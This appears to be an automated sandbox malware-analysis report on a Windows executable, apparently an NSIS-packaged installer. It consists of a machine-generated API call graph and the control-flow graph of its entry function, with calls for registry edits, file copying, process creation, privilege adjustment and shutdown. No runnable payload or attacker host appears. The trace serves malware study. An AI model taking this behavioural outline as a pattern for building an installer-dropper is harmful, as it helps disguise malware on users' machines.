5237->5241 5238->5237 5239 401423 24 API calls 5240 40224a 5239->5240 5241->5239 5241->5240 5242 4019ff 5243 402c37 17 API calls 5242->5243 5244 401a06 5243->5244 5245 402c37 17 API calls 5244->5245 5246 401a0f 5245->5246 5247 401a16 lstrcmpiW 5246->5247 5248 401a28 lstrcmpW 5246->5248 5249 401a1c 5247->5249 5248->5249 3806 401f00 3821 402c37 3806->3821 3815 401f2b 3817 401f30 3815->3817 3818 401f3b 3815->3818 3816 402885 3846 4061c9 wsprintfW 3817->3846 3820 401f39 CloseHandle 3818->3820 3820->3816 3822 402c43 3821->3822 3847 4062a4 3822->3847 3825 401f06 3827 4052e6 3825->3827 3828 405301 3827->3828 3836 401f10 3827->3836 3829 40531d lstrlenW 3828->3829 3832 4062a4 17 API calls 3828->3832 3830 405346 3829->3830 3831 40532b lstrlenW 3829->3831 3834 405359 3830->3834 3835 40534c SetWindowTextW 3830->3835 3833 40533d lstrcatW 3831->3833 3831->3836 3832->3829 3833->3830 3834->3836 3837 40535f SendMessageW SendMessageW SendMessageW 3834->3837 3835->3834 3838 405867 CreateProcessW 3836->3838 3837->3836 3839 401f16 3838->3839 3840 40589a CloseHandle 3838->3840 3839->3816 3839->3820 3841 40670d WaitForSingleObject 3839->3841 3840->3839 3842 406727 3841->3842 3843 406739 GetExitCodeProcess 3842->3843 3889 406698 3842->3889 3843->3815 3846->3820 3848 4062b1 3847->3848 3849 4064fc 3848->3849 3852 4064ca lstrlenW 3848->3852 3855 4062a4 10 API calls 3848->3855 3857 4063df GetSystemDirectoryW 3848->3857 3858 4063f2 GetWindowsDirectoryW 3848->3858 3859 406516 5 API calls 3848->3859 3860 406426 SHGetSpecialFolderLocation 3848->3860 3861 4062a4 10 API calls 3848->3861 3862 40646d lstrcatW 3848->3862 3873 406150 3848->3873 3878 4061c9 wsprintfW 3848->3878 3879 406282 lstrcpynW 3848->3879 3850 402c64 3849->3850 3880 406282 lstrcpynW 3849->3880 3850->3825 3864 406516 3850->3864 3852->3848 3855->3852 3857->3848 3858->3848 3859->3848 3860->3848 3863 40643e SHGetPathFromIDListW CoTaskMemFree 3860->3863 3861->3848 3862->3848 3863->3848 3871 406523 3864->3871 3865 406599 3866 40659e CharPrevW 3865->3866 3868 4065bf 3865->3868 3866->3865 3867 40658c CharNextW 3867->3865 3867->3871 3868->3825 3870 406578 CharNextW 3870->3871 3871->3865 3871->3867 3871->3870 3872 406587 CharNextW 3871->3872 3885 405b80 3871->3885 3872->3867 3881 4060ef 3873->3881 3876 406184 RegQueryValueExW RegCloseKey 3877 4061b4 3876->3877 3877->3848 3878->3848 3879->3848 3880->3850 3882 4060fe 3881->3882 3883 406102 3882->3883 3884 406107 RegOpenKeyExW 3882->3884 3883->3876 3883->3877 3884->3883 3886 405b86 3885->3886 3887 405b9c 3886->3887 3888 405b8d CharNextW 3886->3888 3887->3871 3888->3886 3890 4066b5 PeekMessageW 3889->3890 3891 4066c5 WaitForSingleObject 3890->3891 3892 4066ab DispatchMessageW 3890->3892 3891->3842 3892->3890 5250 401000 5251 401037 BeginPaint GetClientRect 5250->5251 5252 40100c DefWindowProcW 5250->5252 5254 4010f3 5251->5254 5255 401179 5252->5255 5256 401073 CreateBrushIndirect FillRect DeleteObject 5254->5256 5257 4010fc 5254->5257 5256->5254 5258 401102 CreateFontIndirectW 5257->5258 5259 401167 EndPaint 5257->5259 5258->5259 5260 401112 6 API calls 5258->5260 5259->5255 5260->5259 4177 100027c2 4178 10002812 4177->4178 4179 100027d2 VirtualProtect 4177->4179 4179->4178 5261 401503 5262 40150b 5261->5262 5264 40151e 5261->5264 5263 402c15 17 API calls 5262->5263 5263->5264 4215 402306 4216 40230e 4215->4216 4219 402314 4215->4219 4217 402c37 17 API calls 4216->4217 4217->4219 4218 402322 4221 402330 4218->4221 4222 402c37 17 API calls 4218->4222 4219->4218 4220 402c37 17 API calls 4219->4220 4220->4218 4223 402c37 17 API calls 4221->4223 4222->4221 4224 402339 WritePrivateProfileStringW 4223->4224 5265 401f86 5266 402c37 17 API calls 5265->5266 5267 401f8d 5266->5267 5268 40665c 5 API calls 5267->5268 5269 401f9c 5268->5269 5270 401fb8 GlobalAlloc 5269->5270 5271 402020 5269->5271 5270->5271 5272 401fcc 5270->5272 5273 40665c 5 API calls 5272->5273 5274 401fd3 5273->5274 5275 40665c 5 API calls 5274->5275 5276 401fdd 5275->5276 5276->5271 5280 4061c9 wsprintfW 5276->5280 5278 402012 5281 4061c9 wsprintfW 5278->5281 5280->5278 5281->5271 4232 402388 4233 402390 4232->4233 4234 4023bb 4232->4234 4244 402c77 4233->4244 4236 402c37 17 API calls 4234->4236 4238 4023c2 4236->4238 4249 402cf5 4238->4249 4239 4023a1 4241 402c37 17 API calls 4239->4241 4242 4023a8 RegDeleteValueW RegCloseKey 4241->4242 4243 4023cf 4242->4243 4245 402c37 17 API calls 4244->4245 4246 402c8e 4245->4246 4247 4060ef RegOpenKeyExW 4246->4247 4248 402397 4247->4248 4248->4239 4248->4243 4250 402d0b 4249->4250 4251 402d21 4250->4251 4253 402d2a 4250->4253 4251->4243 4254 4060ef RegOpenKeyExW 4253->4254 4255 402d58 4254->4255 4256 402dd0 4255->4256 4263 402d5c 4255->4263 4256->4251 4257 402d7e RegEnumKeyW 4258 402d95 RegCloseKey 4257->4258 4257->4263 4260 40665c 5 API calls 4258->4260 4259 402db6 RegCloseKey 4259->4256 4262 402da5 4260->4262 4261 402d2a 6 API calls 4261->4263 4264 402dc4 RegDeleteKeyW 4262->4264 4265 402da9 4262->4265 4263->4257 4263->4258 4263->4259 4263->4261 4264->4256 4265->4256 5282 40190c 5283 401943 5282->5283 5284 402c37 17 API calls 5283->5284 5285 401948 5284->5285 5286 405990 67 API calls 5285->5286 5287 401951 5286->5287 5288 401d0e 5289 402c15 17 API calls 5288->5289 5290 401d15 5289->5290 5291 402c15 17 API calls 5290->5291 5292 401d21 GetDlgItem 5291->5292 5293 40258c 5292->5293 5294 1000164f 5295 10001516 GlobalFree 5294->5295 5297 10001667 5295->5297 5296 100016ad GlobalFree 5297->5296 5298 10001682 5297->5298 5299 10001699 VirtualFree 5297->5299 5298->5296 5299->5296 5300 40190f 5301 402c37 17 API calls 5300->5301 5302 401916 5301->5302 5303 4058e4 MessageBoxIndirectW 5302->5303 5304 40191f 5303->5304 5305 401491 5306 4052e6 24 API calls 5305->5306 5307 401498 5306->5307 5308 402592 5309 4025c1 5308->5309 5310 4025a6 5308->5310 5312 4025f5 5309->5312 5313 4025c6 5309->5313 5311 402c15 17 API calls 5310->5311 5318 4025ad 5311->5318 5314 402c37 17 API calls 5312->5314 5315 402c37 17 API calls 5313->5315 5316 4025fc lstrlenW 5314->5316 5317 4025cd WideCharToMultiByte lstrlenA 5315->5317 5316->5318 5317->5318 5320 405e55 5 API calls 5318->5320 5321 40263f 5318->5321 5322 402629 5318->5322 5319 405e26 WriteFile 5319->5321 5320->5322 5322->5319 5322->5321 5323 10001058 5325 10001074 5323->5325 5324 100010dd 5325->5324 5326 10001516 GlobalFree 5325->5326 5327 10001092 5325->5327 5326->5327 5328 10001516 GlobalFree 5327->5328 5329 100010a2 5328->5329 5330 100010b2 5329->5330 5331 100010a9 GlobalSize 5329->5331 5332 100010b6 GlobalAlloc 5330->5332 5333 100010c7 5330->5333 5331->5330 5334 1000153d 3 API calls 5332->5334 5335 100010d2 GlobalFree 5333->5335 5334->5333 5335->5324 5336 401c19 5337 402c15 17 API calls 5336->5337 5338 401c20 5337->5338 5339 402c15 17 API calls 5338->5339 5340 401c2d 5339->5340 5341 401c42 5340->5341 5342 402c37 17 API calls 5340->5342 5343 401c52 5341->5343 5346 402c37 17 API calls 5341->5346 5342->5341 5344 401ca9 5343->5344 5345 401c5d 5343->5345 5348 402c37 17 API calls 5344->5348 5347 402c15 17 API calls 5345->5347 5346->5343 5349 401c62 5347->5349 5350 401cae 5348->5350 5351 402c15 17 API calls 5349->5351 5352 402c37 17 API calls 5350->5352 5353 401c6e 5351->5353 5354 401cb7 FindWindowExW 5352->5354 5355 401c99 SendMessageW 5353->5355 5356 401c7b SendMessageTimeoutW 5353->5356 5357 401cd9 5354->5357 5355->5357 5356->5357 5358 402a9a SendMessageW 5359 402ab4 InvalidateRect 5358->5359 5360 402abf 5358->5360 5359->5360 5361 40281b 5362 402821 5361->5362 5363 402829 FindClose 5362->5363 5364 402abf 5362->5364 5363->5364 5365 40149e 5366 4022f1 5365->5366 5367 4014ac PostQuitMessage 5365->5367 5367->5366 5368 40469f 5369 4046d5 5368->5369 5370 4046af 5368->5370 5372 40427e 8 API calls 5369->5372 5371 404217 18 API calls 5370->5371 5373 4046bc SetDlgItemTextW 5371->5373 5374 4046e1 5372->5374 5373->5369 5375 100010e1 5376 10001111 5375->5376 5377 100011d8 GlobalFree 5376->5377 5378 100012ba 2 API calls 5376->5378 5379 100011d3 5376->5379 5380 10001272 2 API calls 5376->5380 5381 10001164 GlobalAlloc 5376->5381 5382 100011f8 GlobalFree 5376->5382 5383 100012e1 lstrcpyW 5376->5383 5384 100011c4 GlobalFree 5376->5384 5378->5376 5379->5377 5380->5384 5381->5376 5382->5376 5383->5376 5384->5376 5385 4015a3 5386 402c37 17 API calls 5385->5386 5387 4015aa SetFileAttributesW 5386->5387 5388 4015bc 5387->5388 5389 405425 5390 405446 GetDlgItem GetDlgItem GetDlgItem 5389->5390 5391 4055cf 5389->5391 5434 40424c SendMessageW 5390->5434 5393 405600 5391->5393 5394 4055d8 GetDlgItem CreateThread CloseHandle 5391->5394 5395 40562b 5393->5395 5396 405650 5393->5396 5397 405617 ShowWindow ShowWindow 5393->5397 5394->5393 5398 40568b 5395->5398 5401 405665 ShowWindow 5395->5401 5402 40563f 5395->5402 5403 40427e 8 API calls 5396->5403 5436 40424c SendMessageW 5397->5436 5398->5396 5407 405699 SendMessageW 5398->5407 5399 4054b6 5404 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 5399->5404 5410 405685 5401->5410 5411 405677 5401->5411 5408 4041f0 SendMessageW 5402->5408 5409 40565e 5403->5409 5405 40552b 5404->5405 5406 40550f SendMessageW SendMessageW 5404->5406 5412 405530 SendMessageW 5405->5412 5413 40553e 5405->5413 5406->5405 5407->5409 5414 4056b2 CreatePopupMenu 5407->5414 5408->5396 5416 4041f0 SendMessageW 5410->5416 5415 4052e6 24 API calls 5411->5415 5412->5413 5418 404217 18 API calls 5413->5418 5417 4062a4 17 API calls 5414->5417 5415->5410 5416->5398 5419 4056c2 AppendMenuW 5417->5419 5420 40554e 5418->5420 5421 4056f2 TrackPopupMenu 5419->5421 5422 4056df GetWindowRect 5419->5422 5423 405557 ShowWindow 5420->5423 5424 40558b GetDlgItem SendMessageW 5420->5424 5421->5409 5425 40570d 5421->5425 5422->5421 5426 40556d ShowWindow 5423->5426 5429 40557a 5423->5429 5424->5409 5427 4055b2 SendMessageW SendMessageW 5424->5427 5428 405729 SendMessageW 5425->5428 5426->5429 5427->5409 5428->5428 5430 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5428->5430 5435 40424c SendMessageW 5429->5435 5432 40576b SendMessageW 5430->5432 5432->5432 5433 405794 GlobalUnlock SetClipboardData CloseClipboard 5432->5433 5433->5409 5434->5399 5435->5424 5436->5395 5437 4028a7 5438 402c37 17 API calls 5437->5438 5439 4028b5 5438->5439 5440 4028cb 5439->5440 5441 402c37 17 API calls 5439->5441 5442 405d4f 2 API calls 5440->5442 5441->5440 5443 4028d1 5442->5443 5465 405d74 GetFileAttributesW CreateFileW 5443->5465 5445 4028de 5446 402981 5445->5446 5447 4028ea GlobalAlloc 5445->5447 5450 402989 DeleteFileW 5446->5450 5451 40299c 5446->5451 5448 402903 5447->5448 5449 402978 CloseHandle 5447->5449 5466 40332b SetFilePointer 5448->5466 5449->5446 5450->5451 5453 402909 5454 403315 ReadFile 5453->5454 5455 402912 GlobalAlloc 5454->5455 5456 402922 5455->5456 5457 402956 5455->5457 5459 4030fa 31 API calls 5456->5459 5458 405e26 WriteFile 5457->5458 5460 402962 GlobalFree 5458->5460 5464 40292f 5459->5464 5461 4030fa 31 API calls 5460->5461 5463 402975 5461->5463 5462 40294d GlobalFree 5462->5457 5463->5449 5464->5462 5465->5445 5466->5453 4275 4058aa ShellExecuteExW 5467 40432b lstrcpynW lstrlenW 4276 40202c 4277 40203e 4276->4277 4287 4020f0 4276->4287 4278 402c37 17 API calls 4277->4278 4280 402045 4278->4280 4279 401423 24 API calls 4283 40224a 4279->4283 4281 402c37 17 API calls 4280->4281 4282 40204e 4281->4282 4284 402064 LoadLibraryExW 4282->4284 4285 402056 GetModuleHandleW 4282->4285 4286 402075 4284->4286 4284->4287 4285->4284 4285->4286 4299 4066cb WideCharToMultiByte 4286->4299 4287->4279 4290 402086 4293 4020a5 4290->4293 4294 40208e 4290->4294 4291 4020bf 4292 4052e6 24 API calls 4291->4292 4295 402096 4292->4295 4302 10001759 4293->4302 4296 401423 24 API calls 4294->4296 4295->4283 4297 4020e2 FreeLibrary 4295->4297 4296->4295 4297->4283 4300 4066f5 GetProcAddress 4299->4300 4301 402080 4299->4301 4300->4301 4301->4290 4301->4291 4303 10001789 4302->4303 4344 10001b18 4303->4344 4305 10001790 4306 100018a6 4305->4306 4307 100017a1 4305->4307 4308 100017a8 4305->4308 4306->4295 4392 10002286 4307->4392 4376 100022d0 4308->4376 4313 100017d7 4328 100017cd 4313->4328 4402 10002b57 4313->4402 4314 100017be 4318 100017c4 4314->4318 4322 100017cf 4314->4322 4315 1000180c 4319 10001812 4315->4319 4320 1000184e 4315->4320 4316 100017ee 4405 100024a4 4316->4405 4318->4328 4386 1000289c 4318->4386 4324 100015b4 3 API calls 4319->4324 4326 100024a4 10 API calls 4320->4326 4321 100017f4 4416 100015b4 4321->4416 4396 10002640 4322->4396 4330 10001828 4324->4330 4331 10001840 4326->4331 4328->4315 4328->4316 4334 100024a4 10 API calls 4330->4334 4343 10001895 4331->4343 4427 10002467 4331->4427 4333 100017d5 4333->4328 4334->4331 4338 1000189f GlobalFree 4338->4306 4339 10001881 4339->4343 4431 1000153d wsprintfW 4339->4431 4341 1000187a FreeLibrary 4341->4339 4343->4306 4343->4338 4434 1000121b GlobalAlloc 4344->4434 4346 10001b3c 4435 1000121b GlobalAlloc 4346->4435 4348 10001d7a GlobalFree GlobalFree GlobalFree 4349 10001d97 4348->4349 4366 10001de1 4348->4366 4350 100020ee 4349->4350 4358 10001dac 4349->4358 4349->4366 4352 10002110 GetModuleHandleW 4350->4352 4350->4366 4351 10001c1d GlobalAlloc 4371 10001b47 4351->4371 4354 10002121 LoadLibraryW 4352->4354 4355 10002136 4352->4355 4353 10001c86 GlobalFree 4353->4371 4354->4355 4354->4366 4442 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4355->4442 4356 10001c68 lstrcpyW 4359 10001c72 lstrcpyW 4356->4359 4358->4366 4438 1000122c 4358->4438 4359->4371 4360 10002188 4361 10002195 lstrlenW 4360->4361 4360->4366 4443 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4361->4443 4363 10002048 4363->4366 4368 10002090 lstrcpyW 4363->4368 4366->4305 4367 10002148 4367->4360 4375 10002172 GetProcAddress 4367->4375 4368->4366 4369 10001cc4 4369->4371 4436 1000158f GlobalSize GlobalAlloc 4369->4436 4370 10001f37 GlobalFree 4370->4371 4371->4348 4371->4351 4371->4353 4371->4356 4371->4359 4371->4363 4371->4366 4371->4369 4371->4370 4374 1000122c 2 API calls 4371->4374 4441 1000121b GlobalAlloc 4371->4441 4372 100021af 4372->4366 4374->4371 4375->4360 4383 100022e8 4376->4383 4378 10002410 GlobalFree 4381 100017ae 4378->4381 4378->4383 4379 100023ba GlobalAlloc CLSIDFromString 4379->4378 4380 1000238f GlobalAlloc WideCharToMultiByte 4380->4378 4381->4313 4381->4314 4381->4328 4382 1000122c GlobalAlloc lstrcpynW 4382->4383 4383->4378 4383->4379 4383->4380 4383->4382 4385 100023d9 4383->4385 4445 100012ba 4383->4445 4385->4378 4449 100025d4 4385->4449 4387 100028ae 4386->4387 4388 10002953 SetFilePointer 4387->4388 4389 10002971 4388->4389 4390 10002a62 GetLastError 4389->4390 4391 10002a6d 4389->4391 4390->4391 4391->4328 4393 10002296 4392->4393 4394 100017a7 4392->4394 4393->4394 4395 100022a8 GlobalAlloc 4393->4395 4394->4308 4395->4393 4400 1000265c 4396->4400 4397 100026c0 4399 100026c5 GlobalSize 4397->4399 4401 100026cf 4397->4401 4398 100026ad GlobalAlloc 4398->4401 4399->4401 4400->4397 4400->4398 4401->4333 4404 10002b62 4402->4404 4403 10002ba2 GlobalFree 4404->4403 4452 1000121b GlobalAlloc 4405->4452 4407 10002506 MultiByteToWideChar 4411 100024ae 4407->4411 4408 1000252b StringFromGUID2 4408->4411 4409 1000253c lstrcpynW 4409->4411 4410 1000254f wsprintfW 4410->4411 4411->4407 4411->4408 4411->4409 4411->4410 4412 1000256c GlobalFree 4411->4412 4413 100025a7 GlobalFree 4411->4413 4414 10001272 2 API calls 4411->4414 4453 100012e1 4411->4453 4412->4411 4413->4321 4414->4411 4457 1000121b GlobalAlloc 4416->4457 4418 100015ba 4420 100015e1 4418->4420 4421 100015c7 lstrcpyW 4418->4421 4422 100015fb 4420->4422 4423 100015e6 wsprintfW 4420->4423 4421->4422 4424 10001272 4422->4424 4423->4422 4425 100012b5 GlobalFree 4424->4425 4426 1000127b GlobalAlloc lstrcpynW 4424->4426 4425->4331 4426->4425 4428 10002475 4427->4428 4430 10001861 4427->4430 4429 10002491 GlobalFree 4428->4429 4428->4430 4429->4428 4430->4339 4430->4341 4432 10001272 2 API calls 4431->4432 4433 1000155e 4432->4433 4433->4343 4434->4346 4435->4371 4437 100015ad 4436->4437 4437->4369 4444 1000121b GlobalAlloc 4438->4444 4440 1000123b lstrcpynW 4440->4366 4441->4371 4442->4367 4443->4372 4444->4440 4446 100012c1 4445->4446 4447 1000122c 2 API calls 4446->4447 4448 100012df 4447->4448 4448->4383 4450 100025e2 VirtualAlloc 4449->4450 4451 10002638 4449->4451 4450->4451 4451->4385 4452->4411 4454 100012ea 4453->4454 4455 1000130c 4453->4455 4454->4455 4456 100012f0 lstrcpyW 4454->4456 4455->4411 4456->4455 4457->4418 5468 402a2f 5469 402c15 17 API calls 5468->5469 5470 402a35 5469->5470 5471 402a6c 5470->5471 5473 402a47 5470->5473 5474 402885 5470->5474 5472 4062a4 17 API calls 5471->5472 5471->5474 5472->5474 5473->5474 5476 4061c9 wsprintfW 5473->5476 5476->5474 5477 401a30 5478 402c37 17 API calls 5477->5478 5479 401a39 ExpandEnvironmentStringsW 5478->5479 5480 401a4d 5479->5480 5482 401a60 5479->5482 5481 401a52 lstrcmpW 5480->5481 5480->5482 5481->5482 5488 401db3 GetDC 5489 402c15 17 API calls 5488->5489 5490 401dc5 GetDeviceCaps MulDiv ReleaseDC 5489->5490 5491 402c15 17 API calls 5490->5491 5492 401df6 5491->5492 5493 4062a4 17 API calls 5492->5493 5494 401e33 CreateFontIndirectW 5493->5494 5495 40258c 5494->5495 5496 4043b4 5497 4044e6 5496->5497 5499 4043cc 5496->5499 5498 404550 5497->5498 5500 40461a 5497->5500 5505 404521 GetDlgItem SendMessageW 5497->5505 5498->5500 5501 40455a GetDlgItem 5498->5501 5502 404217 18 API calls 5499->5502 5507 40427e 8 API calls 5500->5507 5503 404574 5501->5503 5504 4045db 5501->5504 5506 404433 5502->5506 5503->5504 5512 40459a SendMessageW LoadCursorW SetCursor 5503->5512 5504->5500 5508 4045ed 5504->5508 5529 404239 EnableWindow 5505->5529 5510 404217 18 API calls 5506->5510 5511 404615 5507->5511 5514 404603 5508->5514 5515 4045f3 SendMessageW 5508->5515 5517 404440 CheckDlgButton 5510->5517 5530 404663 5512->5530 5514->5511 5519 404609 SendMessageW 5514->5519 5515->5514 5516 40454b 5520 40463f SendMessageW 5516->5520 5527 404239 EnableWindow 5517->5527 5519->5511 5520->5498 5522 40445e GetDlgItem 5528 40424c SendMessageW 5522->5528 5524 404474 SendMessageW 5525 404491 GetSysColor 5524->5525 5526 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5524->5526 5525->5526 5526->5511 5527->5522 5528->5524 5529->5516 5533 4058aa ShellExecuteExW 5530->5533 5532 4045c9 LoadCursorW SetCursor 5532->5504 5533->5532 5534 402835 5535 40283d 5534->5535 5536 402841 FindNextFileW 5535->5536 5537 402853 5535->5537 5536->5537 5539 4029e0 5537->5539 5540 406282 lstrcpynW 5537->5540 5540->5539 5541 401735 5542 402c37 17 API calls 5541->5542 5543 40173c SearchPathW 5542->5543 5544 4029e0 5543->5544 5545 401757 5543->5545 5545->5544 5547 406282 lstrcpynW 5545->5547 5547->5544 5548 10002a77 5549 10002a8f 5548->5549 5550 1000158f 2 API calls 5549->5550 5551 10002aaa 5550->5551 5552 4014b8 5553 4014be 5552->5553 5554 401389 2 API calls 5553->5554 5555 4014c6 5554->5555 5556 404a3c 5557 404a68 5556->5557 5558 404a4c 5556->5558 5560 404a9b 5557->5560 5561 404a6e SHGetPathFromIDListW 5557->5561 5567 4058c8 GetDlgItemTextW 5558->5567 5563 404a85 SendMessageW 5561->5563 5564 404a7e 5561->5564 5562 404a59 SendMessageW 5562->5557 5563->5560 5565 40140b 2 API calls 5564->5565 5565->5563 5567->5562 4855 403d3e 4856 403e91 4855->4856 4857 403d56 4855->4857 4859 403ea2 GetDlgItem GetDlgItem 4856->4859 4860 403ee2 4856->4860 4857->4856 4858 403d62 4857->4858 4861 403d80 4858->4861 4862 403d6d SetWindowPos 4858->4862 4863 404217 18 API calls 4859->4863 4864 403f3c 4860->4864 4873 401389 2 API calls 4860->4873 4866 403d85 ShowWindow 4861->4866 4867 403d9d 4861->4867 4862->4861 4868 403ecc SetClassLongW 4863->4868 4865 404263 SendMessageW 4864->4865 4869 403e8c 4864->4869 4896 403f4e 4865->4896 4866->4867 4870 403da5 DestroyWindow 4867->4870 4871 403dbf 4867->4871 4872 40140b 2 API calls 4868->4872 4874 4041c1 4870->4874 4875 403dc4 SetWindowLongW 4871->4875 4876 403dd5 4871->4876 4872->4860 4877 403f14 4873->4877 4874->4869 4884 4041d1 ShowWindow 4874->4884 4875->4869 4880 403de1 GetDlgItem 4876->4880 4881 403e7e 4876->4881 4877->4864 4882 403f18 SendMessageW 4877->4882 4878 40140b 2 API calls 4878->4896 4879 4041a2 DestroyWindow EndDialog 4879->4874 4885 403e11 4880->4885 4886 403df4 SendMessageW IsWindowEnabled 4880->4886 4883 40427e 8 API calls 4881->4883 4882->4869 4883->4869 4884->4869 4888 403e1e 4885->4888 4889 403e65 SendMessageW 4885->4889 4890 403e31 4885->4890 4899 403e16 4885->4899 4886->4869 4886->4885 4887 4062a4 17 API calls 4887->4896 4888->4889 4888->4899 4889->4881 4893 403e39 4890->4893 4894 403e4e 4890->4894 4892 404217 18 API calls 4892->4896 4897 40140b 2 API calls 4893->4897 4898 40140b 2 API calls 4894->4898 4895 403e4c 4895->4881 4896->4869 4896->4878 4896->4879 4896->4887 4896->4892 4901 404217 18 API calls 4896->4901 4917 4040e2 DestroyWindow 4896->4917 4897->4899 4900 403e55 4898->4900 4930 4041f0 4899->4930 4900->4881 4900->4899 4902 403fc9 GetDlgItem 4901->4902 4903 403fe6 ShowWindow KiUserCallbackDispatcher 4902->4903 4904 403fde 4902->4904 4927 404239 EnableWindow 4903->4927 4904->4903 4906 404010 EnableWindow 4911 404024 4906->4911 4907 404029 GetSystemMenu EnableMenuItem SendMessageW 4908 404059 SendMessageW 4907->4908 4907->4911 4908->4911 4910 403d1f 18 API calls 4910->4911 4911->4907 4911->4910 4928 40424c SendMessageW 4911->4928 4929 406282 lstrcpynW 4911->4929 4913 404088 lstrlenW 4914 4062a4 17 API calls 4913->4914 4915 40409e SetWindowTextW 4914->4915 4916 401389 2 API calls 4915->4916 4916->4896 4917->4874 4918 4040fc CreateDialogParamW 4917->4918 4918->4874 4919 40412f 4918->4919 4920 404217 18 API calls 4919->4920 4921 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4920->4921 4922 401389 2 API calls 4921->4922 4923 404180 4922->4923 4923->4869 4924 404188 ShowWindow 4923->4924 4925 404263 SendMessageW 4924->4925 4926 4041a0 4925->4926 4926->4874 4927->4906 4928->4911 4929->4913 4931 4041f7 4930->4931 4932 4041fd SendMessageW 4930->4932 4931->4932 4932->4895

                                                              Executed Functions

                                                              Function 00403373 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 8 4033bc 1->8 3 4033c8-4033dc call 4065ec lstrlenA 2->3 9 4033de-4033fa call 40665c * 3 3->9 8->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 22 403404 17->22 22->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 36 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->36 37 403619-403633 DeleteFileW call 402ec1 29->37 34 4034b0-4034b4 31->34 35 4034ab-4034af 31->35 32->31 32->32 38 403573-403580 call 405b80 34->38 39 4034ba-4034c0 34->39 35->34 36->37 54 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 36->54 57 4036e4-4036f4 call 4038b6 OleUninitialize 37->57 58 403639-40363f 37->58 55 403582-403583 38->55 56 403584-40358a 38->56 43 4034c2-4034ca 39->43 44 4034db-403514 39->44 50 4034d1 43->50 51 4034cc-4034cf 43->51 45 403531-40356b 44->45 46 403516-40351b 44->46 45->38 53 40356d-403571 45->53 46->45 52 40351d-403525 46->52 50->44 51->44 51->50 60 403527-40352a 52->60 61 40352c 52->61 53->38 62 403592-4035a0 call 406282 53->62 54->37 54->57 55->56 56->28 64 403590 56->64 75 40381a-403820 57->75 76 4036fa-40370a call 4058e4 ExitProcess 57->76 65 4036d4-4036db call 403990 58->65 66 403645-403650 call 405b80 58->66 60->45 60->61 61->45 70 4035a5 62->70 64->70 74 4036e0 65->74 77 403652-403687 66->77 78 40369e-4036a8 66->78 70->29 74->57 80 403822-403838 GetCurrentProcess OpenProcessToken 75->80 81 40389e-4038a6 75->81 82 403689-40368d 77->82 85 403710-403724 call 40584f lstrcatW 78->85 86 4036aa-4036b8 call 405c5b 78->86 88 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40386e-40387c call 40665c 80->89 83 4038a8 81->83 84 4038ac-4038b0 ExitProcess 81->84 90 403696-40369a 82->90 91 40368f-403694 82->91 83->84 100 403731-40374b lstrcatW lstrcmpiW 85->100 101 403726-40372c lstrcatW 85->101 86->57 99 4036ba-4036d0 call 406282 * 2 86->99 88->89 102 40388a-403895 ExitWindowsEx 89->102 103 40387e-403888 89->103 90->82 95 40369c 90->95 91->90 91->95 95->78 99->65 100->57 106 40374d-403750 100->106 101->100 102->81 104 403897-403899 call 40140b 102->104 103->102 103->104 104->81 110 403752-403757 call 4057b5 106->110 111 403759 call 405832 106->111 116 40375e-40376c SetCurrentDirectoryW 110->116 111->116 118 403779-4037a2 call 406282 116->118 119 40376e-403774 call 406282 116->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 128->57 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 00403396
                                                              • GetVersion.KERNEL32 ref: 0040339C
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                              • OleInitialize.OLE32(00000000), ref: 00403413
                                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                              • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
